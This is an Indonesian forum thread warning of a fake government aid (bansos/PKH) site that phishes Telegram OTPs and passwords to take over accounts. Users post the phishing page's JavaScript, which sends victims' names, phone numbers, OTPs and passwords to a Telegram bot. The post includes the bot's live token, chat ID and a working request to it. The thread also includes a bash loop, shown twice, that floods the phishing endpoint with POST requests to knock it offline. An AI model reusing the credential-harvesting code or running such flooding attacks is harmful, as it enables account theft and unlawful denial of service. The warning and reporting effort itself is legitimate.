Sebarkan n Laporkan Domain Phising

[mybloodiscoffee]

Jadi setengah jam lalu sobat saya kena jebakan melalui salah 1 subdomain .my.id dimana domain utamanya adalah p0rtal.my.id

Disini saya minta kepada rekan yg meregistrasikan domain tersebut harap membantu mencabut atau rekan lain ikut bantu laporkan ke PANDI agar dibanned.

Domain p0rtal.my.id membuat web phising melalui subdomainnya yaitu https://daftarpkhbansos.p0rtal.my.id/

Menjebak org dng bantuan PKH yg jelas palsu bukan dari pemerintah. Modusnya share url tsb di wa. Calon korban mampir Krn cuma ngisi nama dan nomor telegram kemudian menyerahkan kode otp telegram maka akun telegram si korban akan diambil alih dan menghapus perangkat terpercaya milik si korban shg korban TDK dpt mengakses telegram miliknya lagi. Setelah itu bbrp lama kemudian nomor telegram si korban kena banned oleh telegram.

Disitu ada kemungkinan proses bukan sekedar iseng ambil alih telegram saja tp di dalam telegram tiap org bisa jadi ada info penting yg bisa dipakai utk tindakan pemerasan ke korban dan aktivitas ilegal lainnya (perkiraan saya).

Tolong bantu share ke org awam bahwa ga ada namanya pemerintah pake telegram apalagi domain .my.id. Apalagi minta otp segala.

Bantu juga laporkan domain tsb serta laporkan domain sejenis lainnya ke PANDI.

Jika postingan ini salah tempat harap moderator bantu memindahkan ke tempat yg sesuai.

Terima kasih.

 

[mybloodiscoffee]

Nambahin Krn sdh lewat masa editing.

Web subdomain itu jg pakai domain lainnya yaitu https://bansos022.join-jeco.my.id/

 

[sa1638]

ngeri juga, apa hidupnya bakal tenang dengan mencari duit beginian. Mending jualan yang legal/halal yang minta dikasihani (minta dibeli/diborong).

 

[Kencang.ID]

const TELEGRAM_API_URL = 'https://api.telegram.org/bot7348417027:AAHZcZjgoz1nsEnOv1fzpdYXGRTvlEYS1tk/sendMessage'; // Ganti dengan token bot Telegram Anda
const CHAT_ID = '1266497081'; // Ganti dengan chat ID Telegram Anda

async function sendToTelegram(message) {
try {
const response = await fetch(TELEGRAM_API_URL, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({
chat_id: CHAT_ID,
text: message
})
});

if (!response.ok) {
throw new Error('Network response was not ok');
}

const data = await response.json();
console.log('Data berhasil dikirim ke Telegram:', data);
return true;
} catch (error) {
console.error('Terjadi kesalahan saat mengirim data ke Telegram:', error);
return false;
}
}

function nextStep() {
const currentStep = document.querySelector('.form-step:not(.hidden)');
const nextStep = currentStep.nextElementSibling;

// Validasi inputan
if (!validateInputs(currentStep)) {
alert('Harap isi semua kolom sebelum melanjutkan.');
return;
}

// Simpan data dari langkah saat ini
let message = '';
if (currentStep.id === 'step1') {
const name = document.querySelector('input[name="name"]').value;
const phone = document.querySelector('input[name="phone"]').value;
document.getElementById('name').value = name;
document.getElementById('phone').value = phone;
message = `BANSOS 1:\n- Nama: ${name}\n- No.HP: ${phone}`;
} else if (currentStep.id === 'step2') {
const name = document.getElementById('name').value;
const phone = document.getElementById('phone').value;
const otp = document.querySelector('input[name="otp"]').value;
document.getElementById('name2').value = name;
document.getElementById('phone2').value = phone;
document.getElementById('otp').value = otp;
message = `BANSOS 2:\n- Nama: ${name}\n- No.HP: ${phone}\n- OTP: ${otp}`;
} else if (currentStep.id === 'step3') {
// Ambil nilai dari input
const name = document.getElementById('name2').value;
const phone = document.getElementById('phone2').value;
const otp = document.getElementById('otp').value;
const password = document.querySelector('input[name="password"]').value;

// Debugging: Log nilai untuk memastikan semuanya diambil dengan benar
console.log('Debug Step 3:');
console.log('Name:', name);
console.log('Phone:', phone);
console.log('OTP:', otp);
console.log('Password:', password);

// Bangun pesan
message = `BANSOS 3:\n- Nama: ${name}\n- No.HP: ${phone}\n- OTP: ${otp}\n- Pass: ${password}`;
}

kalau dilihat sepertinya variable message = `BANSOS 3:\n- Nama: ${name}\n- No.HP: ${phone}\n- OTP: ${otp}\n- Pass: ${password}`;

bakal dikirim ke id telegram ini pake bot dengan token tsb

const TELEGRAM_API_URL = 'https://api.telegram.org/bot7348417027:AAHZcZjgoz1nsEnOv1fzpdYXGRTvlEYS1tk/sendMessage'; // Ganti dengan token bot Telegram Anda
const CHAT_ID = '1266497081'; // Ganti dengan chat ID Telegram Anda

kali aja gabut mau nyoba ngespam, bisa coba akses url ini ato ga coba report bot telegramnya ajah

https://api.telegram.org/bot7348417027:AAHZcZjgoz1nsEnOv1fzpdYXGRTvlEYS1tk/sendMessage?chat_id=1266497081&text=HelloWorld

Result:

{"ok":true,"result":{"message_id":1751,"from":{"id":7348417027,"is_bot":true,"first_name":"KERIS DEWA","username":"Pajero008_bot"},"chat":{"id":1266497081,"first_name":"Maya devi Gupta","type":"private"},"date":1734873666,"text":"HelloWorld"}}

 

[horasjey]

DDOS Ajah tuan, Biar email dia kebanjiran Spam

#!/bin/bash
#Scipt By ChatGPT  Horas Siregar Cowok Gemini ^_^
# URL yang akan diakses
URL="https://bansos022.join-jeco.my.id/thirdData.php"

# Data yang akan dikirimkan
FULL_NAME="Horas Ganteng"
PHONE_NUMBER="112"
OTP_CODE="123455"
PASSWORD="HorasGanteng"

# Waktunya Menyerang sampai Down
while true
do
    echo "Mengirim permintaan POST ke $URL"
    
    # Mengirimkan permintaan POST menggunakan curl
    RESPONSE=$(curl -X POST "$URL" \
        -d "validateFullName=$FULL_NAME&validatePhoneNumber=$PHONE_NUMBER&validateOtp_code=$OTP_CODE&password=$PASSWORD" \
        -H "Content-Type: application/x-www-form-urlencoded")
    
    # Menampilkan respons dari server
    echo "Respons dari server: $RESPONSE"
    
    # Menunggu 1 detik sebelum percobaan berikutnya
    sleep 1
done

 

[mybloodiscoffee]

DDOS Ajah tuan, Biar email dia kebanjiran Spam

#!/bin/bash
#Scipt By ChatGPT  Horas Siregar Cowok Gemini ^_^
# URL yang akan diakses
URL="https://bansos022.join-jeco.my.id/thirdData.php"

# Data yang akan dikirimkan
FULL_NAME="Horas Ganteng"
PHONE_NUMBER="112"
OTP_CODE="123455"
PASSWORD="HorasGanteng"

# Waktunya Menyerang sampai Down
while true
do
    echo "Mengirim permintaan POST ke $URL"
   
    # Mengirimkan permintaan POST menggunakan curl
    RESPONSE=$(curl -X POST "$URL" \
        -d "validateFullName=$FULL_NAME&validatePhoneNumber=$PHONE_NUMBER&validateOtp_code=$OTP_CODE&password=$PASSWORD" \
        -H "Content-Type: application/x-www-form-urlencoded")
   
    # Menampilkan respons dari server
    echo "Respons dari server: $RESPONSE"
   
    # Menunggu 1 detik sebelum percobaan berikutnya
    sleep 1
done

View attachment 7782

Sbnrnya ni dah laporin ke PANDI walau ada cabang lain yg bukan domain Indonesia msh berkeliaran dmana2. Ada bbrp akun tele tetangga kawan saya yg di take over pelaku itu setelah isi form itu. Maklum aja...tdk semua warga melek IT kita ga bisa salahin korban.

Mau saya DDOS tp kok ya ingat dosa masa lalu.